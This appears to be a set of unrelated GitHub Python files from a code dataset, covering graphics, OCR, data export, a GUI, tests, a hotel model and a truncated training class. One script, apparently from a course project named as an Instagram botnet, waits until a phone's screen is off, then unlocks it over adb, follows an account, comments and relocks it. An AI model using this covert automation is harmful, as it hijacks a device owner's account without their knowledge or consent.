new_verts.extend([seg.r, seg.s, seg.t, seg.u])\n indices = [[i+u, i+v, i+w] for i in range(0, len(new_verts), 4)\n for (u, v, w) in [(0,1,3), (3,2,0)]]\n\n # UV mapped to vertex locations\n min_x = min((i[0] for i in new_verts))\n max_x = max((i[0] for i in new_verts))\n min_y = min((i[1] for i in new_verts))\n max_y = max((i[1] for i in new_verts))\n x_range = max_x - min_x\n y_range = max_y - min_y\n texcoords = [[(i[0] - min_x) / x_range, 1.0 - (i[1] - min_y) / y_range] for i in new_verts]\n # need normals if using texcoords\n normals = [[0.0, 0.0, -1.0] for i in range(len(new_verts))]\n\n self.buf = [Buffer(self, new_verts, texcoords, indices, normals, smooth=False)]\n self.set_material(material)","repo_name":"tipam/pi3d","sub_path":"pi3d/shape/PolygonLines.py","file_name":"PolygonLines.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"40"} +{"seq_id":"37222144176","text":"import cv2\nimport pytesseract\n\n\ndef ocr(image, platePath):\n\n\tplate = cv2.imread(platePath)\n\ttext = pytesseract.image_to_string(plate , lang='eng')\n\tprint(text)\n\n\tcv2.putText(image,text, (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, 255,2)\n\t","repo_name":"arpitj07/Licence-Plate-Recognition-OpenCV","sub_path":"OCR.py","file_name":"OCR.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14767732326","text":"import sys\nimport distributedIGAlgorithm\n\n\ndef rebuildString(tasks, startNum):\n newString = \"\"\n for taskNum in range(startNum, len(tasks)):\n newString += tasks[taskNum] + \"\\n\"\n\n return newString\n\nfile = open(\"/media/napster/data/train/informationGain/aboveZero.txt\", 'r')\ntasks = file.readlines()\nfile.close()\n\nendList = []\n\nbatch = []\nstart = 1\nfor taskNum in range(start, len(tasks)):\n task = list(eval(tasks[taskNum]))\n batch.append(task)\n if taskNum % 100 == 0 and taskNum != start:\n new = distributedIGAlgorithm.runProcessBacklogItem(batch, taskNum-99)\n batch = []\n print(str(taskNum))\n\n\n\n","repo_name":"ndrabins/malifier","sub_path":"localIGRun.py","file_name":"localIGRun.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"36075445598","text":"#!/usr/bin/env python3\nimport string\nfrom collections import OrderedDict\nimport shutil,os\nimport mysql.connector\nimport pandas as pd\n\nimport seqp\n\npd.set_option('display.max_rows', 1000)\npd.set_option('display.width', 1000)\npd.set_option('display.max_columns', 500)\n\ndef update_call(df,submitter_id,callsign):\n tf = df['submitter_id'] == submitter_id\n df.loc[tf,'callsign'] = [callsign]\n return df\n\ndef delete_station(df,submitter_id):\n tf = df['submitter_id'] != submitter_id\n df = df[tf].copy()\n return df\n\ndef grid_case(grid):\n \"\"\"\n Correct case of grid sqaures.\n \"\"\"\n try:\n grid = grid[:2].upper() + grid[2:]\n grid = grid[:-2] + grid[-2:].lower()\n except:\n pass\n return grid\n\n\ndef format_filename(s):\n \"\"\"Take a string and return a valid filename constructed from the string.\nUses a whitelist approach: any characters not present in valid_chars are\nremoved. Also spaces are replaced with underscores.\n \nNote: this method may produce invalid filenames such as ``, `.` or `..`\nWhen I use this method I prepend a date string like '2009_01_15_19_46_32_'\nand append a file extension like '.txt', so I avoid the potential of using\nan invalid filename.\n \n\"\"\"\n s = s.replace('/','-')\n valid_chars = \"-_.() %s%s\" % (string.ascii_letters, string.digits)\n filename = ''.join(c for c in s if c in valid_chars)\n filename = filename.replace(' ','_') # I don't like spaces in filenames.\n return filename\n\ndef clean_call(callsign):\n call = callsign.split()[0].replace('/','-')\n return call\n\nlog_dir = 'log_files'\nif os.path.exists(log_dir):\n shutil.rmtree(log_dir)\nos.makedirs(log_dir)\n\ndsn_dir = 'station_descriptions'\nif os.path.exists(dsn_dir):\n shutil.rmtree(dsn_dir)\nos.makedirs(dsn_dir)\n\nuser = 'hamsci'\npassword = 'hamsci'\nhost = 'localhost'\ndatabase = 'hamsci_rsrch'\ndb = mysql.connector.connect(user=user,password=password,host=host,database=database,buffered=True,use_pure=True)\n\n#cols = []\n#cols.append('submitter_id')\n#cols.append('has_multi')\n#cols.append('first_name')\n#cols.append('last_name')\n#cols.append('is_multi')\n#cols.append('club_name')\n#cols.append('callsign')\n#cols.append('email')\n#cols.append('per_gs')\n#cols.append('radio_model')\n#cols.append('power')\n#cols.append('is_tot')\n#cols.append('is_out')\n#cols.append('is_pub')\n#cols.append('ground_conductivity')\n#cols.append('submitted_log')\n#cols.append('submitted_dsn')\n#cols.append('log_fname')\n#cols.append('dsn_fname')\n#cols.append('comment')\n#cols.append('entered')\n#qry = (\"SELECT {!s} FROM seqp_submissions;\".format(','.join(cols)))\n\nqry = (\"SELECT * FROM seqp_submissions;\")\ncrsr = db.cursor()\ncrsr.execute(qry)\nresults = crsr.fetchall()\ncolumns = crsr.column_names\ncrsr.close()\n\ncols = OrderedDict()\ncols['submitter_id'] = 'submitter_id'\ncols['callsign'] = 'callsign'\ncols['per_gs'] = 'gridsquare_submitted'\ncols['lat_calculated'] = 'lat_calculated'\ncols['lon_calculated'] = 'lon_calculated'\ncols['radio_model'] = 'radio_model'\ncols['power'] = 'tx_power_watts'\ncols['log_fname'] = 'log_filename'\ncols['dsn_fname'] = 'station_description_filename'\n#cols['entered'] = 'entered'\n\nkeys = dict(zip(columns,range(len(columns))))\ndf_lst = []\n\nlog_files = {}\ndsn_files = {}\nfor result in results:\n tmp = {}\n for col in cols.keys():\n if col in ['lat_calculated','lon_calculated']:\n tmp[col] = 'NaN'\n else:\n tmp[col] = result[keys[col]]\n df_lst.append(tmp)\n\n sId = result[keys['submitter_id']]\n dsn_files[sId] = result[keys['submitted_dsn']]\n log_files[sId] = result[keys['submitted_log']]\n\n\ndf = pd.DataFrame(df_lst)\ndf = df[list(cols.keys())].copy()\n\n# Remove log filenames for IDs <= 293 due to a collection bug.\ntf = df.submitter_id <= 293\ndf.loc[tf,'log_fname'] = None\n\n\n# Capitalize\ndf['callsign'] = df['callsign'].apply(lambda x: x.upper())\n\n# Drop duplicates based on callsign (keep last/most up-to-date entry)\ndf = df.drop_duplicates('callsign',keep='last')\n\n# Fix obvious errors.\nupdate_call(df,382,'W0ECC')\nupdate_call(df,968,'WG4FOC')\nupdate_call(df,881,'AF0E7')\nupdate_call(df,332,'AC0PR')\nupdate_call(df,344,'N0UV')\nupdate_call(df,542,'K0VH')\nupdate_call(df,774,'WB0IXV')\n\n# Delete ones we know are wrong and have no chance of being helpful.\ndf = delete_station(df,171)\ndf = delete_station(df,32)\ndf = delete_station(df,785)\ndf = delete_station(df,527)\n\n# Calculate Grid Square\ndf_lst = []\nfor rinx,row in df.iterrows():\n row['per_gs'] = grid_case(row['per_gs'])\n\n try:\n latlon = seqp.locator.gridsquare2latlon(row['per_gs'])\n row['lat_calculated'] = '{:.04f}'.format(latlon[0])\n row['lon_calculated'] = '{:.04f}'.format(latlon[1])\n except:\n pass\n df_lst.append(row)\ndf = pd.DataFrame(df_lst)\n\n# Reset the index\ndf = df.sort_values('callsign')\ndf.index = range(len(df))\ndf_lst = []\nfor rinx,row in df.iterrows():\n callsign = clean_call(row['callsign'])\n pfx = '{:03d}_{!s}'.format(rinx,callsign)\n sId = row['submitter_id']\n log_fname = row['log_fname']\n log_file = log_files[sId]\n\n if log_fname is not None:\n fname = format_filename('{!s}_{!s}'.format(pfx,log_fname))\n fpath = os.path.join(log_dir,fname)\n row['log_fname'] = fname\n print(fpath)\n with open(fpath,'wb') as fl:\n fl.write(log_file)\n\n dsn_fname = row['dsn_fname']\n dsn_file = dsn_files[sId]\n\n if dsn_fname is not None:\n fname = format_filename('{!s}_{!s}'.format(pfx,dsn_fname))\n fpath = os.path.join(dsn_dir,fname)\n row['dsn_fname'] = fname\n print(fpath)\n with open(fpath,'wb') as fl:\n fl.write(dsn_file)\n df_lst.append(row)\n\ndf = pd.DataFrame(df_lst)\ndf = df[list(cols.keys())].copy()\ndf.index.name = 'index'\n\ndel df['submitter_id']\ndf = df.rename(columns=cols)\ndf.to_csv('station_info.csv')\nimport ipdb; ipdb.set_trace()\n","repo_name":"HamSCI/seqp-scoring","sub_path":"zenodo/write_operator_info.py","file_name":"write_operator_info.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43129160905","text":"import Tkinter, tkFont, Pmw, os, os.path, sys\nfrom tkFileDialog import askopenfilename, askdirectory,\\\n asksaveasfilename\nfrom tkMessageBox import showerror, showinfo, Message,\\\n askquestion\nfrom pfmfind.GUI.view import View\nfrom pfmfind.GUI.optionmenu import OptionMenu\n\n_FIXED_RANGE = True # Allow only lengths from 6 to 20\n\n\nclass SettingsView(Tkinter.Frame, View):\n def __init__(self, parent, PFMF_client, update_func):\n self.parent = parent\n Tkinter.Frame.__init__(self, parent)\n self.pack_propagate(0)\n\n self.PFMF_client = PFMF_client\n self.update_func = update_func\n\n # ************************************************************\n # ******* Database Settings **********************************\n # ************************************************************\n\n self.wDbGrp = Pmw.Group(self, tag_text='Database Settings')\n self.wDbGrp.pack(anchor='nw', fill='x', padx=5, pady=7)\n\n w = Tkinter.Frame(self.wDbGrp.interior())\n w.pack(anchor='w')\n\n Tkinter.Label(w, text=\"PostgreSQL Driver:\").grid(row=0,\\\n column=0, padx=5, pady=5, sticky='w')\n self.wDriverMenu = OptionMenu(w, items=['psycopg2'],\n menubutton_width=20,\n menu_font=self.ffont,\n menubutton_font=self.ffont)\n self.wDriverMenu.grid(row=0, column=1, padx=5, pady=5, sticky='w')\n\n Tkinter.Label(w, text=\"Database:\").grid(row=0, column=2, padx=5,\n pady=5, sticky='w')\n self.wDbEntry = Pmw.EntryField(w, entry_width = 25,\n entry_font=self.ffont)\n self.wDbEntry.grid(row=0, column=3, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Host:\").grid(row=2, column=0, padx=5,\n pady=5, sticky='w')\n self.wHostEntry = Pmw.EntryField(w, entry_width = 30,\n entry_font=self.ffont)\n self.wHostEntry.grid(row=2, column=1, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Port:\").grid(row=2, column=2, padx=5,\n pady=5, sticky='w')\n self.wPortEntry = Pmw.EntryField(w, entry_width =10,\n entry_font=self.ffont)\n self.wPortEntry.grid(row=2, column=3, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"User:\").grid(row=4, column=0, padx=5,\n pady=5, sticky='w')\n self.wUserEntry = Pmw.EntryField(w, entry_width =25,\n entry_font=self.ffont)\n self.wUserEntry.grid(row=4, column=1, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Password:\").grid(row=4, column=2,\n padx=5, pady=5,\n sticky='w')\n self.wPswdEntry = Pmw.EntryField(w, entry_width =25,\n entry_show=\"*\",\n entry_font=self.ffont)\n self.wPswdEntry.grid(row=4, column=3, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Dataset schema:\").grid(row=6, column=0,\n padx=5, pady=5,\n sticky='w')\n\n self.wDSEntry = Pmw.EntryField(w, entry_width =25,\n entry_font=self.ffont)\n self.wDSEntry.grid(row=6, column=1, padx=5, pady=5,\n sticky='w')\n Tkinter.Label(w, text=\"PFMFind schema:\").grid(row=6, column=2,\n padx=5, pady=5,\n sticky='w')\n self.wPSEntry = Pmw.EntryField(w, entry_width =25,\n entry_font=self.ffont)\n self.wPSEntry.grid(row=6, column=3, padx=5, pady=5,\n sticky='w')\n\n self.wDbButFrm = Tkinter.Frame(w)\n self.wDbButFrm.grid(row=8, column=0, columnspan=2,\n padx=5, pady=10, sticky='we')\n\n self.wDbClrBut = Tkinter.Button(self.wDbButFrm,\n text='Reset',\n command=self._reset_db)\n self.wDbClrBut.pack(side='left', padx=10)\n self.wDbConBut = Tkinter.Button(self.wDbButFrm,\n text='Connect',\n command=self._connect_db)\n self.wDbConBut.pack(side='left', padx=10)\n self.wDbDisBut = Tkinter.Button(self.wDbButFrm,\n text='Disconnect',\n command=self._disconnect_db)\n self.wDbDisBut.pack(side='left', padx=10)\n\n\n # ************************************************************\n # ******* Index Settings *************************************\n # ************************************************************\n\n self.wIndexGrp = Pmw.Group(self, tag_text='Index Settings')\n self.wIndexGrp.pack(anchor='nw', padx=5, pady=7, fill='x')\n\n w = Tkinter.Frame(self.wIndexGrp.interior())\n w.pack(anchor='w')\n\n Tkinter.Label(w, text=\"Host:\").grid(row=0,\n column=0, padx=5,\n pady=5, sticky='w')\n self.wIxHostEntry = Pmw.EntryField(w, entry_width=30,\n entry_font=self.ffont)\n self.wIxHostEntry.grid(row=0, column=1, padx=5, pady=5,\n sticky='w')\n\n Tkinter.Label(w, text=\"Port:\").grid(row=0, column=2, padx=5,\n pady=5, sticky='w')\n self.wIxPortEntry = Pmw.EntryField(w, entry_width=10,\n entry_font=self.ffont)\n self.wIxPortEntry.grid(row=0, column=3, padx=5, pady=5,\n sticky='w')\n\n\n self.wIxButFrm = Tkinter.Frame(w)\n self.wIxButFrm.grid(row=2, column=0, columnspan=2,\n padx=5, pady=10, sticky='we')\n\n self.wIxClrBut = Tkinter.Button(self.wIxButFrm,\n text='Reset',\n command=self._reset_ix)\n self.wIxClrBut.pack(side='left', padx=10)\n self.wIxConBut = Tkinter.Button(self.wIxButFrm,\n text='Connect',\n command=self._connect_ix)\n self.wIxConBut.pack(side='left', padx=10)\n self.wIxDisBut = Tkinter.Button(self.wIxButFrm,\n text='Disconnect',\n command=self._disconnect_ix)\n self.wIxDisBut.pack(side='left', padx=10)\n\n\n\n # ************************************************************\n # ******* Plugin Settings ************************************\n # ************************************************************\n\n self.wPluginGrp = Pmw.Group(self, tag_text='Plugin Settings')\n self.wPluginGrp.pack(anchor='nw', padx=5, pady=7, fill='x',\n expand=1)\n\n w = Tkinter.Frame(self.wPluginGrp.interior())\n w.pack(anchor='w')\n\n Tkinter.Label(w, text='Custom Plugin Path:').grid(row=0,\\\n column=0, padx=5, pady=5, sticky='w')\n\n self.wPlgPathEntry = Pmw.EntryField(w, entry_width=60,\n entry_font=self.ffont)\n self.wPlgPathEntry.grid(row=0, column=1, padx=5, pady=5,\n sticky='w')\n\n self.wPlgPathBut = Tkinter.Button(w, text='Choose...',\\\n width=5, command=self._set_plugin_path)\n self.wPlgPathBut.grid(row=0, column=3, padx=5, pady=5,\n sticky='w')\n\n self.wPlButFrm = Tkinter.Frame(w)\n self.wPlButFrm.grid(row=2, column=0, columnspan=2,\n padx=5, pady=10, sticky='we')\n\n self.wPlClrBut = Tkinter.Button(self.wPlButFrm,\n text='Reset',\n command=self._reset_pl)\n self.wPlClrBut.pack(side='left', padx=10)\n self.wPlSetBut = Tkinter.Button(self.wPlButFrm,\n text='Set',\n command=self._set_pl)\n self.wPlSetBut.pack(side='left', padx=5)\n\n # ************************************************************\n # ******* Load/Save buttons **********************************\n # ************************************************************\n\n self.wLoad = Tkinter.Button(self, text='Load Settings...',\n command=self._load)\n self.wLoad.pack(side='left', anchor='nw', padx=5, pady=5)\n\n self.wSave = Tkinter.Button(self, text='Save Current Settings...',\n command=self._save)\n self.wSave.pack(side='right', anchor='ne', padx=5, pady=5)\n\n\n # Update the form\n self._db_form = {'db': self.wDbEntry, 'host': self.wHostEntry,\n 'port': self.wPortEntry, 'user': self.wUserEntry,\n 'password': self.wPswdEntry}\n\n\n self.update()\n\n def _reset_db(self):\n if self.PFMF_client.driver:\n self.wDriverMenu.setvalue(self.PFMF_client.driver)\n else:\n self.wDriverMenu.invoke(0)\n\n for k, v in self._db_form.iteritems():\n if k in self.PFMF_client.dbargs:\n self._db_form[k].setvalue(self.PFMF_client.dbargs[k])\n else:\n self._db_form[k].setvalue('')\n\n if self.PFMF_client.db_schema:\n self.wDSEntry.setvalue(self.PFMF_client.db_schema)\n else:\n self.wDSEntry.setvalue('')\n\n if self.PFMF_client.PFMF_schema:\n self.wPSEntry.setvalue(self.PFMF_client.PFMF_schema)\n else:\n self.wPSEntry.setvalue('')\n\n def _connect_db(self):\n dbargs = dict()\n\n s = self.wPortEntry.getvalue().strip()\n if len(s):\n try:\n port = int(s)\n except ValueError:\n showerror('Input Error', 'Port must be a number.',\n parent=self.parent)\n return\n dbargs['port'] = s\n\n dbargs['driver'] = self.wDriverMenu.getvalue()\n\n s = self.wDbEntry.getvalue().strip()\n if len(s):\n dbargs['db'] = s\n\n s = self.wHostEntry.getvalue().strip()\n if len(s):\n dbargs['host'] = s\n\n s = self.wUserEntry.getvalue().strip()\n if len(s):\n dbargs['user'] = s\n s = self.wPswdEntry.getvalue().strip()\n if len(s):\n dbargs['password'] = s\n\n try:\n self.PFMF_client.open(**dbargs)\n except:\n showerror('Connection Error', 'Could not connect to' \\\n ' PostgreSQL database.',\n parent=self.parent)\n return\n\n schemata = dict()\n s = self.wDSEntry.getvalue().strip()\n if len(s):\n schemata['db_schema'] = s\n s = self.wPSEntry.getvalue().strip()\n if len(s):\n schemata['PFMF_schema'] = s\n try:\n self.PFMF_client.set_schema(**schemata)\n except:\n showerror('Connection Error', 'Could not initialise the' \\\n ' given\\n or default database schemata.',\n parent=self.parent)\n self.PFMF_client.close()\n return\n\n self.update()\n\n def _disconnect_db(self):\n self.PFMF_client.close()\n self.update()\n\n\n def _reset_ix(self):\n if self.PFMF_client.host:\n self.wIxHostEntry.setvalue(self.PFMF_client.host)\n else:\n self.wIxHostEntry.setvalue('')\n if self.PFMF_client.port:\n self.wIxPortEntry.setvalue(str(self.PFMF_client.port))\n else:\n self.wIxPortEntry.setvalue('')\n\n def _connect_ix(self):\n host = self.wIxHostEntry.getvalue().strip()\n port = self.wIxPortEntry.getvalue().strip()\n\n try:\n port = int(port)\n except ValueError:\n showerror('Input Error', 'Port must be a number.',\n parent=self.parent)\n return\n\n if not self.PFMF_client.attach(host, port):\n showerror('Connection Error', 'Could not connect to' \\\n ' FSIndex server\\n at %s:%s.' % (host, port),\n parent=self.parent)\n return\n self.update()\n\n def _disconnect_ix(self):\n self.PFMF_client.detach()\n self.update()\n\n def _set_plugin_path(self):\n path = askdirectory(mustexist=1,\n parent = self.parent,\n title = 'Choose Plugin Directory',\n initialdir=os.getcwd(),\n )\n if path == ():\n return\n self.wPlgPathEntry.setvalue(path)\n\n def _reset_pl(self):\n if self.PFMF_client.plugin_dir:\n self.wPlgPathEntry.setvalue(self.PFMF_client.plugin_dir)\n else:\n self.wPlgPathEntry.setvalue('')\n\n def _set_pl(self):\n path = self.wPlgPathEntry.getvalue()\n if not os.path.isdir(path):\n showerror('Input Error', 'Invalid plugin path.',\n parent=self.parent)\n return\n self.PFMF_client.init_plugins(path)\n\n def _load(self):\n path = askopenfilename(defaultextension='.xml',\n filetypes=[('XML File','.xml')],\n parent = self.parent,\n title = 'Choose Settings File',\n initialdir=os.getcwd())\n if not len(path): return\n fp = file(path, 'r')\n self.PFMF_client.read_config(fp)\n fp.close()\n self.update()\n\n def _save(self):\n path = asksaveasfilename(defaultextension='.xml',\n filetypes=[('XML File','.xml')],\n parent = self.parent,\n title = 'Choose Settings File',\n initialdir=os.getcwd())\n if path == (): return\n fp = file(path, 'w')\n self.PFMF_client.write_config(fp)\n fp.close()\n\n\n def update(self):\n self._reset_db()\n self._reset_ix()\n self._reset_pl()\n\n if self.PFMF_client.conn:\n self.wDbConBut.configure(state='disabled')\n self.wDbDisBut.configure(state='normal')\n self.wLoad.configure(state='disabled')\n\n if self.PFMF_client.host and self.PFMF_client.port:\n self.wDbDisBut.configure(state='disabled')\n self.wIxConBut.configure(state='disabled')\n self.wIxDisBut.configure(state='normal')\n else:\n self.wIxConBut.configure(state='normal')\n self.wIxDisBut.configure(state='disabled')\n\n else:\n self.wDbConBut.configure(state='normal')\n self.wDbDisBut.configure(state='disabled')\n self.wLoad.configure(state='normal')\n self.wIxConBut.configure(state='disabled')\n self.wIxDisBut.configure(state='disabled')\n\n self.update_func()\n","repo_name":"astojmir/PFMFind","sub_path":"pfmfind/GUI/settings_view.py","file_name":"settings_view.py","file_ext":"py","file_size_in_byte":15837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71135319161","text":"import unittest\nfrom selenium import webdriver\n\n\nclass TestPrueba(unittest.TestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome(\"chromedriver\")\n\n def tearDown(self):\n self.browser.close()\n\n def test_texto_barra_busqueda_despues_de_buscar(self):\n self.browser.get(\"https://www.google.com\")\n #name=\"q\"\n barra_busqueda = self.browser.find_element_by_name(\"q\")\n barra_busqueda.send_keys(\"django docs\")\n #name=\"btnK\n boton_buscar = self.browser.find_element_by_name(\"btnK\")\n #sleep(5)\n self.browser.implicitly_wait(5)\n boton_buscar.click() \n\n barra_busqueda = self.browser.find_element_by_name(\"q\")\n texto = barra_busqueda.get_property(\"value\")\n self.assertEqual(texto, \"django docs\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"enzostefani507/python-info","sub_path":"Test/test_selenium.py","file_name":"test_selenium.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30825926740","text":"from adb import adb\nimport os, argparse, time\nfrom datetime import datetime\nimport xml.etree.ElementTree as ET\n\nphone = adb()\n\n\ndef parse_layout():\n xml_string = phone.dump_layout()\n try:\n root = ET.fromstring(xml_string)\n except Exception as e:\n print(\"error reading layout: %s\" % str(e))\n return None\n return root\n\ndef find_coordinates(root, attribute, text):\n\tfor i in root.iter(\"node\"):\n\t\tif i.attrib[attribute] and i.attrib[attribute] == text:\n\t\t\tbounds = i.get(\"bounds\")\n\t\t\ta = bounds.split(\"[\")\n\t\t\tx = int(a[1].split(\",\")[0])\n\t\t\ta = bounds.split(\"]\")\n\t\t\ty = int(a[0].split(\",\")[1])\n\t\t\treturn (x,y)\n\treturn (-1, -1)\n\ndef follow_account(account):\n\t#press Seach and Explore to find the account\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"content-desc\", \"Search and Explore\")\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\n\t#press Search and enter account\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"text\", \"Search\")\n\t\tif (x==-1 or y==-1):\n return False\t\t\t\n\t\tphone.tap(x,y)\n\t\tphone.input_text(account)\n\t\tphone.input_keyevent(66)\t\n\t\t\t\n\t#select the account\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"text\", account)\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\n\t# follow the account\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"text\", \"Follow\")\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\t\t\n\treturn True\n\ndef comment_on_photo(account, photo_n, comment):\n\tphoto_n = int(photo_n)\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t#assuming 3*3\n\t\tcolumn = photo_n % 3\n\t\trow = photo_n//3 + 1\n\t\t(x, y) = find_coordinates(root, \"content-desc\", \"Photo by A. at Row %d, Column %d\" % (row, column))\n\t\tphone.tap(x,y)\n\t\ttime.sleep(1)\t\n\tprint(\"tapped on the photo\")\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"content-desc\", \"Comment\")\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\t\tphone.input_text(comment)\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"resource-id\", \"com.instagram.android:id/layout_comment_thread_post_button\")\t\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\t\ttime.sleep(3)\n\treturn True\n\t\nif (__name__ == '__main__'):\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-f\", \"--follow\", help=\"An account to follow\", required=True) \n\tparser.add_argument(\"-p\", \"--photo_number\", help=\"Photo to be commented\")\n\tparser.add_argument(\"-c\", \"--comment\", help=\"Comment to be posted\") \n\targs = vars(parser.parse_args())\n\tif phone.check_package(\"com.instagram.android\"):\n\t\tif phone.check_if_off():\n\t\t\tprint(\"Starting evil things\")\n\t\t\tphone.unlock()\n\t\t\tphone.open(\"com.instagram.android\")\n\t\t\ttime.sleep(2)\n\t\t\tif (follow_account(args[\"follow\"]) and comment_on_photo(args[\"follow\"], args[\"photo_number\"], args[\"comment\"])):\n\t\t\t\tprint(\"Success\")\n\t\t\telse:\n\t\t\t\tprint(\"try again\")\n\t\t\tphone.close(\"com.instagram.android\")\n\t\t\tphone.lock()\t\n\t\telse:\n\t\t\tprint(\"User can see the phone\")\n\telse:\n\t\tprint(\"Instagram is not installed\")\n","repo_name":"aliyevaa/EC700_Instagram_botnet","sub_path":"followme.py","file_name":"followme.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1046378574","text":"from sql_alchemy import db\nclass HotelModel(db.Model):\n\n __tablename__ = 'hotels' # This is the name of the table in the database\n\n hotel_id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80))\n city = db.Column(db.String(80))\n stars = db.Column(db.Float(precision=1))\n price = db.Column(db.Float(precision=2))\n\n def save_to_db(self): # This method is used to save the data to the database\n pass\n\n\n def __init__(self, hotel_id, name, city, stars, price):\n self.hotel_id = hotel_id\n self.name = name\n self.city = city\n self.stars = stars\n self.price = price\n\n def json(self): # This method is used to return the data in a json format\n return {\n 'hotel_id': self.hotel_id,\n 'name': self.name,\n 'city': self.city,\n 'stars': self.stars,\n 'price': self.price\n }\n \n @classmethod\n def find_hotel(cls, hotel_id):\n return cls.query.filter_by(hotel_id=hotel_id).first() if cls.query.filter_by(hotel_id=hotel_id).first() else None\n # SELECT * FROM hotels WHERE hotel_id = hotel_id\n\n def save_hotel(self):\n db.session.add(self)\n db.session.commit()\n\n def update_hotel(self, name, city, stars, price):\n self.name = name\n self.city = city\n self.stars = stars\n self.price = price\n db.session.commit()\n\n def delete_hotel(self):\n db.session.delete(self)\n db.session.commit()","repo_name":"renanhiramatsu/Travel-Agency","sub_path":"models/hotel.py","file_name":"hotel.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13766621924","text":"\"\"\"\r\nClass for model training.\r\n\"\"\"\r\n\r\nimport copy\r\nimport inspect\r\nimport json\r\nimport logging\r\nimport os\r\nimport sys\r\nimport time\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.utils.data.dataloader import DataLoader\r\n\r\nfrom modeling.evaluation.evaluator import Evaluator\r\nfrom modeling.evaluation.eval_args import EvalArgs\r\nfrom modeling.training.train_epoch import TrainEpoch\r\nfrom modeling.training.train_history import TrainHistory\r\nfrom modeling.training.args.logging_args import LoggingArgs\r\nfrom modeling.training.args.loss_args import LossArguments\r\nfrom modeling.training.args.opt_args import OptimizationArguments\r\nfrom utils import is_jsonable, set_seed\r\n\r\n\r\nclass Trainer:\r\n \"\"\"\r\n Base class for model trainer.\r\n \"\"\"\r\n def __init__(self, train_args, multi_proc_args, model, train_dataset, val_dataset=None):\r\n \"\"\"\r\n :param train_args: dictionary containing arguments related to model to training\r\n - should contain: seed, opt_args, loss_args, logging args, and eval args\r\n :param multi_proc_args: arguments related to multi-processing\r\n :param model: model to train\r\n :param train_dataset: dataset with training data - should work with pytorch dataloader\r\n :param val_dataset (optional): dataset with validation data - should work with pytorch dataloader\r\n \"\"\"\r\n # setup args\r\n self.train_args_dict = train_args\r\n self.opt_args = self._get_opt_args()\r\n self.loss_args = self._get_loss_args()\r\n self.multi_proc_args = multi_proc_args\r\n self.logging_args = self._get_log_args()\r\n self.eval_args = self._get_eval_args()\r\n\r\n # setup logging\r\n self.logger = self._get_logger()\r\n\r\n # get device\r\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n # setup model\r\n self.model = model\r\n model_signature = inspect.signature(self.model.forward)\r\n self.model_input_args = list(model_signature.parameters.keys())\r\n self._setup_model()\r\n\r\n # setup data\r\n self.train_dataset = train_dataset\r\n self.val_dataset = val_dataset\r\n\r\n # set seed\r\n self.seed = self.train_args_dict[\"seed\"]\r\n set_seed(self.seed)\r\n\r\n # init train hist\r\n self.train_hist = self._init_train_history()\r\n\r\n def train(self):\r\n \"\"\"\r\n Train model.\r\n \"\"\"\r\n self.logger.info(\"Starting TRAIN\")\r\n train_start_time = time.time()\r\n\r\n # training setup - stopping checker & train epoch module\r\n stop_checker = self.opt_args.create_stop_checker()\r\n opt = self.opt_args.create_optimizer(self.model)\r\n train_dataloader = self._get_train_dataloader()\r\n train_epoch = TrainEpoch(\r\n self.model,\r\n self.model_input_args,\r\n self.multi_proc_args,\r\n self.loss_args,\r\n self.logger,\r\n train_dataloader,\r\n opt,\r\n stop_checker,\r\n self.train_hist\r\n )\r\n\r\n # run training\r\n self._run_train(train_epoch, stop_checker)\r\n self._log_train_completion(train_start_time)\r\n\r\n if self.opt_args.load_best_model_at_end:\r\n 